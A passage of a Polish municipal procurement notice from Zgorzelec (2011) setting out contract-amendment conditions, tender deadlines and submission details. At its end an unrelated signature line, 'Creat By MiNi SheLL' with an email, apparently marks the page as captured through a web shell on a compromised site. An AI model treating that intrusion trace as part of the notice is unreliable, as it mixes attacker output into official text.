       c) z przyczyn losowych, w przypadku wystąpienia działania siły wyższej, mającej 
           bezpośredni wpływ na terminowość wykonania robót budowlanych,   
       d) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym 
           wpływ na realizację przedmiotu zamówienia,                  
       e) wstrzymania robót budowlanych  przez uprawnione do tego organy w 
           okolicznościach, za które Wykonawca nie ponosi odpowiedzialności,         
       f)  w przypadku wystąpienia istotnych wad dokumentacji projektowej, skutkujących 
            koniecznością dokonania poprawek lub uzupełnień, jeżeli uniemożliwia to lub 
            istotnie wstrzymuje realizację określonego rodzaju robót, 
       g)  w przypadku wystąpienia okoliczności, o których mowa w § 1 ust. 11 projektu 
            umowy mających bezpośredni wpływ na roboty budowlane stanowiące przedmiot 
            umowy. 

    2) Zmiana harmonogramu rzeczowo-finansowego w przypadku zmiany terminu 
        wykonania przedmiotu umowy.  
         
    3) Strony dopuszczają możliwość zmiany harmonogramu rzeczowo-finansowego, nie
         mającej wpływu na termin wykonania przedmiotu umowy, określony w § 3 ust. 1 
         projektu umowy z przyczyn technicznych lub technologicznych bądź wynikających
         z organizacji procesu inwestycyjnego (budowlanego). 
         Zmiany harmonogramu rzeczowo-finansowego uzgodnionego przez obie strony, 
         zostaną wprowadzone aneksem do niniejszej umowy.

    4) Zmiana osób wskazanych w umowie z imienia i nazwiska odpowiedzialnych za 
        realizację umowy, o których mowa w § 11 projektu umowy, będzie możliwa w 
        każdym czasie  w trakcie związania umową pod warunkiem,  że osoba  ta posiadać 
        będzie co najmniej takie same uprawnienia jak osoba wskazana przez Wykonawcę 
        w ofercie.   


    5) Zmiana Podwykonawcy możliwa będzie jedynie wtedy, gdy zakres realizowanych 
        przez Podwykonawcę robót, nie ulegnie zmianie w stosunku do zakresu robót 
        wskazanych w ofercie Wykonawcy, a które zaplanował on do realizacji przez 
        Podwykonawcę. Zmiana taka możliwa będzie jedynie na uzasadniony  wniosek 
        Wykonawcy, do którego winien załączyć projekt umowy z Podwykonawcą, przy 
        czym wymagana jest w tym przypadku pisemna zgoda Zamawiającego na zawarcie 
        przez Wykonawcę umowy z innym Podwykonawcą. 

2. W przedstawionych w ust. 1 podpunkt 1 przypadkach wystąpienia opóźnień, strony ustalają 
     nowe terminy realizacji umowy, z tym, że okres  przesunięcia terminu realizacji przedmiotu 
     umowy równy będzie co najmniej okresowi przerwy lub postoju. 

3. Warunkiem wprowadzenia zmian do zawartej umowy będzie potwierdzenie powstałych 
    okoliczności w formie opisowej i właściwie umotywowanej, potwierdzonej przez każdą 
    ze stron umowy. 

4. Strona ubiegająca się o zmianę umowy w w/w przypadkach, powinna zwrócić się do  
    Wykonawcy/Zamawiającego w formie pisemnej z wnioskiem,  o wprowadzenie 
    zmian  w umowie aneksem, w terminie  7 dni od daty zdarzenia uzasadnionego zmianą.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.um-zgorzelec.dolnyslask.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Zgorzelec
Wydział Zamówień Publicznych
59-900 Zgorzelec ul. Domańskiego 6 pokój 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.11.2011 godzina 11:00, miejsce: Urząd Miasta Zgorzelec
               59-900 Zgorzelec 
               ul.  Domańskiego 7
               Punkt Obsługi Interesanta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com